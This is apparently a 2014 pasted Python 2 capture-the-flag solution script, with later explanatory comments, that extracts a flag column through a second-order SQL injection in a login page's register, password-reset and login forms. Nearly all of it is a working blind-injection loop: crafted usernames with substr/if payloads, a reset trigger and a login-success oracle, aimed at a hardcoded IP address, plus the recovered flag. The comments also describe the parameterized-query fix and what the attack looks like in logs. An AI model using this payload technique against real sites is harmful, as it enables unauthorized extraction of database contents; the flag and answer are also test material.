
Untitled

a guest
Apr 14th, 2014
# CTF write-up script (Python 2): recovers the `flag` column of the `flag`
# table one character at a time through the login page's register /
# forgot-password / login forms.
#
# NOTE(review): the paste lost its indentation and carried listing numbers;
# the nesting below is reconstructed from the control flow and should be
# confirmed against the author's copy.
#
# What the script relies on (inferred from the request sequence, not from
# server code): a username stored at registration is presumably concatenated
# unescaped into the SQL statement that the password-reset handler runs.
# That is a second-order (stored) SQL injection; the server-side fix is to
# bind the stored name as a query parameter, since values read back from the
# database are as untrusted as request input.
import random,requests,string

#20BILLION_D0LLAR_1D3A <- flag
#razor4x - tasteless

# Single endpoint that handles all three forms; the submit-button field
# (register / reset / login) selects the action.
main="http://54.196.116.77/index.php?page=login"
# Observed form bodies for each action:
# reg "name=blah&pass=blah&email=blah&register=Register"
# forgot name=blah&reset=Forgot+Password&pass=&email=
# login name=blah&pass=blah&login=Login&email=

def randomword(length):
    """Return `length` random lowercase letters, used as a throwaway account name."""
    return ''.join(random.choice(string.lowercase) for i in range(length))

# Characters confirmed so far, in position order.
pwd=""
# num: 1-based position inside the flag value (positions 1..21).
for num in xrange(1,22):
    # c: candidate character code, tried in ascending order (32..121).
    for c in xrange(32,122):
        # A fresh control account per guess, so one guess cannot affect the next.
        tmp_name=randomword(10)
        c=chr(c)
        # Step 1: register the control account; its password equals its name.
        #print "register the test name"
        payload = {'name': tmp_name, 'pass': tmp_name, "email":"asd","register":"Register"}
        r=requests.post(main,data=payload)
        #print r.text
        # Step 2: register a second account whose name is the control name
        # followed by a SQL condition comparing one flag character with c.
        # The false branch multiplies by a two-row subquery, which presumably
        # makes the surrounding statement fail instead of matching -- TODO confirm.
        #print "register the exploit name"
        query=tmp_name+"' and (select if((select substr(flag,"+str(num)+",1) from flag)='"+c+"',1,2*(select 1 union select 2)))#"
        # Earlier LIKE-based variants, kept by the author but not used:
        #query=base+"0"+"'and(select(if((select(1)from(flag)where(flag)like('"+c+"%'))=1,1,2*(select 1 union select 2))))-- -"
        #query=base+"0"+"'and(select(if((select(1)from(flag)where(flag)like('%'))=1,1,2*(select 1 union select 2))))-- -"
        payload = {'name': query, 'pass': "asd", "email":"asd","register":"Register"}
        r=requests.post(main,data=payload)
        #print r.text
        # Step 3: request a password reset for the crafted name. If the stored
        # name reaches the reset statement unescaped, the statement presumably
        # targets the control account only when the guess is right.
        #print "forgot request"
        payload = {'name': query, 'pass': "", "email":"","reset":"Forgot+Password"}
        r=requests.post(main,data=payload)
        #print r.text
        # Step 4: log in as the control account with its original password.
        #print "try to login with test name"
        payload = {'name': tmp_name, 'pass': tmp_name, "email":"","login":"Login"}
        r=requests.post(main,data=payload)
        #print r.text
        # Oracle: a missing 'Welcome' means the original password no longer
        # works, which the script treats as "the reset ran, so c matched".
        if 'Welcome' not in r.text:
            print "OK: "+c
            pwd+=c
            break
        else:
            print "Nope..."+c


        #break
    #break
# Defender's view: each guess produces two registrations, one reset and one
# login, and the crafted username contains a quote and SQL keywords, so the
# activity is visible in request logs as a burst of such registrations.
print pwd